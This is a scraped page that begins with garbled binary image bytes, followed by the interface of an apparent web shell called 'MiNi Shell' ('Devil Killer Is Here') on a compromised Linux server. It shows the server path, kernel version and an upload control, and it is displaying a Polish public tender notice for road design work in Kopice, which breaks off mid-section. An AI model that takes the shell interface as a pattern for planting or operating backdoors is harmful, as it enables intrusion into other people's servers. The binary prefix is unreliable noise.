JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250613/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250613/0027801701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie projektu budowlanego i wykonawczego dla zadania:<br/>„Rozbudowa drogi wojewódzkiej nr 385 w miejscowości Kopice” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Wojewódzkich w Opolu z up. Województwa Opolskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000126528</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Oleska 127</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-231</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">77 4591800</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">77 4581352</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zdw.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.zdw.opole.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> administracja samorządowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami wojewódzkimi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie projektu budowlanego i wykonawczego dla zadania:<br/>„Rozbudowa drogi wojewódzkiej nr 385 w miejscowości Kopice” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-baf578df-50f9-44a9-af88-f3b92f961cb0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00278017</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00012194/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.28 Wykonanie projektu budowlanego i wykonawczego dla zadania: „Rozbudowa drogi wojewódzkiej nr 385 w miejscowości Kopice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl lub poprzez adres profilu nabywcy: https://platformazakupowa.pl/pn/zdw_opole, w tym dokumentacja dostępna do pobrania pod wskazanym adresem: https://platformazakupowa.pl/transakcja/1117284 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl lub poprzez adres profilu nabywcy: https://platformazakupowa.pl/pn/zdw_opole, w tym dokumentacja dostępna do pobrania pod wskazanym adresem: https://platformazakupowa.pl/transakcja/1117284</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzyst. z platformy przez wykon.<br/>jest bezpłatne. 2. Za datę wpływu ośw., wniosków, zawiad. oraz inf. przyjmuje się datę ich wczytania do platformy. 3. Instr. korzyst. z<br/>platformy: 1) w przypadku posiad. konta na platformie – zgłosz. do postęp. wymaga zalog. wykon. do platformy, 2) w przypadku, gdy<br/>wykon. nie posiada konta na platformie – należy wyszukać niniejsze postęp. bezpośred. na platformie lub poprzez profil nabywcy<br/>zamaw. (link z logo zamaw. następnie zakładka „Postępowania”), wybrać postęp. 3.1. Zalecenia zamaw. odnośnie podpisu: 1) dla<br/>dok. w form. pdf zaleca się podpis w form. PAdES, 2) dok. w form. innym niż pdf zaleca się podpisywać form. XAdES. 3.2. Niezbędne<br/>wymag. sprzęt.-aplik. umożliw. pracę na platformie: 1) stały dostęp do sieci Internet o gwarant. przepust. nie mniej. niż 512 kb/s, 2)<br/>komputer klasy PC lub MAC o następ. konfig.:– pamięć min. 2 GB RAM, – procesor Intel IV 2 GHz lub jego nowsza wersja, – jeden z<br/>system. operac.: * MS Windows 7, * Mac OS x 10.4, * Linux, * lub ich nowsze wersje, 3) zainst. dowolna przegląd. inter., w<br/>przypadku Internet Explorer min. wer. 10.0, 4) włączona obsługa JavaScript, 5) zainst. program Adobe Acrobat Reader lub inny<br/>obsług. pliki w form. pdf. 3.3. Zamaw. rekomend. przesył. danych w form. dopuszcz. odpow. przepisami prawa tj. m.in.: .doc, .xls,<br/>.pdf, .jpg (.jpeg), przy czym zaleca się wykorzyst. plików w form. .pdf. W celu ewent. kompresji danych zamaw. rekomend. wykorzyst.<br/>jednego z form.: . zip; .7Z. 3.4. Zamaw. zaleca, aby nie wprowadz. jakichkolwiek zmian w plikach po ich podpis. Wykon. powinien<br/>pamiętać, aby plik z podpis. przekaz. łącznie z dokum. podpis. – dotyczy podpis. XAdES. 3.5. Infor. na temat kodowania i oznacz.<br/>czasu przekaz. danych. Pliki oferty załącz. przez wykon. na platformie, widoczne są jako zaszyfr. Możliwość otworz. plików<br/>dostępna jest dopiero po odszyfr. przez zamaw. po upływie terminu otwarcia ofert. Oznacz. czasu przekaz. danych przez platformę<br/>stanowi przypiętą do dokum. elektr. lub wiadomości datę oraz dokładny czas (hh:mm:ss). 3.6. Dokum. niniejsz. postęp. dostępna jest<br/>na platformie: https://platformazakupowa.pl, https://platformazakupowa.pl/pn/zdw_opole, www.bip.zdw.opole.pl lub bezpośrednio<br/>pod wskazanym adresem: https://platformazakupowa.pl/transakcja/1117284 w dziale „Załączniki do postępowania”. 3.7. Ofertę, ośw.<br/>wymag. postan. punktu 5.1 SWZ – na załączniku nr 3 do SWZ oraz na załączniku nr 3a do SWZ (w przypadku gdy wykon. polega na<br/>poten. podm. udostęp. zasoby), zobowiąz., o którym mowa w punkcie 4.5. podpunkt 2 SWZ, dokum. i ośw. należy wczytać jako zał.<br/>na platformie, według instr. dla wykon., które znajdują się na platformie. 3.8. Zamaw. w zakr. pytań techn. związ. z dział. systemu<br/>prosi o kontakt z Centrum Wsparcia Klienta platformazakupowa.pl pod numer +48 22 101 02 02, cwk@platformazakupowa.pl, która<br/>udziela wszelkich infor. związ. z procesem składania ofert, rejestracji czy innych aspektów techn. platformy od poniedziałku do piątku<br/>od 08:00 do 17:00. 3.9. Wymag. techn. i organiz. opisane zostały w Regulaminie platformazakupowa.pl. Wykon. uczestn. w przedm.<br/>postęp. powinien zapoznać się z Regulaminem korzystania z platformy i wszelkimi instr., które znajdują się na platformie. 3.10.<br/>Występuje limit objęt. plików lub spakow. folderów w zakresie całej oferty. Szczegół. infor. w tym zakresie znajdują się w instrukcji<br/>zamieszcz. na platformie. 3.11. Przy dużych plikach kluczowe jest łącze inter. i dostępna przepust. łącza po stronie serwera<br/>platformazakupowa.pl oraz użytk. 3.12. Składając ofertę zaleca się zaplan. złożenia jej z wyprzedz. min. 24h, aby zdążyć w terminie<br/>przewidz. na jej złożenie w przypadku siły wyższej, jak np. awaria platformazakupowa.pl, awaria Internetu, problemy techn. związane<br/>z brakiem np. aktualnej przegląd., itp. 3.13. W przypadku większych plików zalecamy skorzystać z instrukcji pakowania plików<br/>dzieląc je na mniejsze paczki, zgodnie z instrukcją dla wykon. znajdującą się na platformie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: 1) administratorem Pani/Pana danych osobowych jest Zarząd Dróg<br/>Wojewódzkich w Opolu, ul. Oleska 127, 45-231 Opole, tel. 77 459 18 00, 2) inspektorem ochrony danych osobowych w Zarządzie<br/>Dróg Wojewódzkich w Opolu jest Pan Jacek Kaflowski, email: iod@zdw.opole.pl, 3) Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Wykonanie projektu budowlanego i wykonawczego dla zadania: „Rozbudowa drogi wojewódzkiej nr 385 w miejscowości Kopice”” prowadzonym w trybie podstawowym bez negocjacji, 4) przetwarzane przez administratora<br/>danych dane osobowe mogą zostać ujawnione m.in. podmiotom prowadzącym działalność płatniczą, podmiotom prowadzącym<br/>działalność kurierską lub pocztową, dostawcom odpowiedzialnym za obsługę systemów informatycznych, podmiotom świadczącym<br/>usługi doradcze, pomoc prawną, podatkową, rachunkową, innym podmiotom, którym dane zostały lub zostaną udostępnione na<br/>podstawie umowy powierzenia przetwarzania danych osobowych lub upoważnienia do przetwarzania danych oraz podmiotom,<br/>którym administrator danych będzie zobowiązany udostępnić dane, zgodnie z obowiązującymi przepisami prawa, 5) dane osobowe<br/>wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat, począwszy od 1 stycznia roku<br/>kalendarzowego następującego po zakończeniu okresu obowiązywania umowy. Okres ten dotyczy również wykonawców, którzy<br/>złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi wykonawcami umowy), 6) obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy<br/>Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy, 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowych Pani/Pana dotyczących. administrator informuje, że w przypadku gdy wykonanie obowiązków, o których mowa w art. 15<br/>ust. 1–3 RODO, wymagałoby niewspółmiernie dużego wysiłku, administrator może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, w<br/>odniesieniu do przetwarzaniem danych osobowych – na etapie przechowywania – zawartych w protokole oraz załącznikach,<br/>wymagałoby niewspółmiernie dużego wysiłku, administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Prawo zamówień publicznych, a w odniesieniu do przetwarzania danych osobowych – na etapie<br/>przechowywania – zawartych w protokole oraz załącznikach, nie może naruszać integralności protokołu oraz jego załączników), c)<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych (wystąpienie z<br/>żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego) z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego), d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO, 9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych, b) prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO, c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 10) Pozostałe<br/>informacje dotyczące RODO znajdują się w projekcie umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WP.3211.35.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest „Wykonanie projektu budowlanego i wykonawczego dla zadania: „Rozbudowa drogi wojewódzkiej nr 385 w miejscowości Kopice”” zgodnie z warunkami specyfikacji. <br/><br/> Kod i nazwa Wspólnego Słownika Zamówień: <br/> 71.32.20.00-1 – usługi inżynierii projektowej w zakresie inżynierii lądowej i <br/> wodnej<br/><br/>2. Przedmiotem zamówienia jest świadczenie usługi na opracowanie dokumentacji projektowej budowlanej i wykonawczej rozbudowy drogi wojewódzkiej nr 385 w miejscowości Kopice z budową drogi dla pieszych i rowerów bądź chodnika o łącznej długości ok. 1,1 km od km 72+715 do km 73+835 (z wyłączeniem przebudowanego odcinka w zakresie obiektu mostowego w km 73+173), budową/przebudową obiektów inżynierskich, przebudową skrzyżowań, przebudową zjazdów, budową kanału technologicznego i budową odwodnienia pasa drogowego na przedmiotowym odcinku drogi, przebudową sieci uzbrojenia terenu i urządzeń kolidujących z inwestycją.<br/><br/>2.1. Przedmiot zamówienia obejmuje:<br/>a)	prace geodezyjne:<br/>- opracowanie mapy do celów projektowych,<br/>- wykonanie podziału działek,<br/>- stabilizacja granic pasa drogowego. <br/>b)	prace projektowe:<br/>- opracowanie projektu budowlanego (w tym projektu zagospodarowania terenu, projektu budowlano-architektonicznego i projektu technicznego),<br/>- opracowanie wniosku wraz z materiałami do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID),<br/>- opracowanie projektu wykonawczego,<br/>- sporządzenie projektu docelowej organizacji ruchu wraz z jej zatwierdzeniem,<br/>- sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego (BIOZ)<br/>- opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych,<br/>- opracowanie części kosztorysowej (kosztorys inwestorski, kosztorys ofertowy, przedmiar robót, kalkulacja cen jednostkowych), <br/>- wykonanie opracowań z zakresu ochrony środowiska w tym raport ooś jeżeli będzie wymagany wraz z uzyskaniem decyzji o środowiskowych uwarunkowaniach przedsięwzięcia,<br/>- wykonanie inwentaryzacji obszaru inwestycji<br/>- opracowanie koncepcji rozwiązań projektowych w zakresie skrzyżowania DW 385 i DP 1540O w min. dwóch wariantach z czego jeden ma stanowić skrzyżowanie w formie ronda,<br/>- opracowanie operatów wodnoprawnych wraz z uzyskaniem wymaganych przepisami prawa zgód wodnoprawnych, o których mowa w art. 388 ustawy Prawo wodne. W gestii Jednostki Projektującej będzie uzyskanie wszystkich wymaganych decyzji, uzgodnień, opinii od właściwych jednostek organizacyjnych Państwowego Gospodarstwa Wodnego Wody Polskie niezbędnych do realizacji inwestycji,<br/>- wykonanie badań gruntu - odwiertów (wg wykazu parametrów wykonania odwiertów geologicznych). Ostateczną ilość odwiertów ustala projektant stosownie do potrzeb projektu i właściwości gruntu. Jednostka Projektująca pozyska wszelkie uzgodnienia, umożliwiające wejście w teren dla wykonania odwiertów,<br/>- uzyskanie uzgodnień z gestorami sieci znajdujących się na terenie przedsięwzięcia,<br/>- uzyskanie uzgodnień z zarządcami dróg innych kategorii (krzyżujących się z planowaną inwestycją)<br/>- sporządzenie materiałów do wniosku o dofinansowanie inwestycji drogowej z środków Unii Europejskiej<br/>- inne elementy niezbędne do realizacji zadania.<br/>c)	przygotowywanie odpowiedzi na pytania wykonawców robót, udzielania wyjaśnień dotyczących opracowanej dokumentacji projektowej oraz dokonywania ewentualnych modyfikacji (poprawek i uzupełnień) w opracowanej dokumentacji projektowej i przetargowej, w trakcie postępowania przetargowego na realizację robót budowlanych dla przedmiotowego przedsięwzięcia.<br/>d)	sprawowanie nadzoru autorskiego w czasie robót budowlanych oraz w okresie rękojmi za wady dla robót budowlanych realizowanych na podstawie dokumentacji projektowej opracowanej przez Jednostkę Projektującą. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">34 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 305 pkt 1 w związku z art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych, całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości. Zamawiający udzieli zamówień polegających na powtórzeniu podobnych usług, wyszczególnionych w formularzu cenowym zamówienia podstawowego i zgodne z przedmiotem zamówienia, gdy będzie posiadał niezbędne środki finansowe.<br/>Zamówienia polegające na powtórzeniu podobnych usług udzielone zostaną w przypadku:<br/>1) zmiany w powszechnie obowiązujących przepisach prawa,<br/>2) wystąpienia siły wyższej, to znaczy niezależnego od stron losowego zdarzenia zewnętrznego, które było niemożliwe do przewidzenia w momencie zawarcia umowy i któremu nie można było zapobiec mimo dochowania należytej staranności,<br/>3) wezwania przez organy administracji publicznej lub inne upoważnione podmioty do uzupełnienia przedmiotu umowy lub<br/>opracowań projektowych ponad zakres przewidziany w umowie,<br/>4) wystąpienia protestów społecznych i/lub przedłużających się odwołań od wydanych decyzji administracyjnych,<br/>5) konieczności uzyskania odstępstwa od obowiązujących przepisów techniczno-budowlanych na podstawie art. 9 ust. 1 ustawy z<br/>dnia 7 lipca 1994 r. Prawo budowlane,<br/>6) w przypadku przyczyn niezależnych od wykonawcy i mających wpływ na wykonanie przedmiotu zamówienia oraz realizację robót<br/>budowlanych na podstawie opracowanej dokumentacji technicznej będącej przedmiotem niniejszego zamówienia</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta drogowego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V 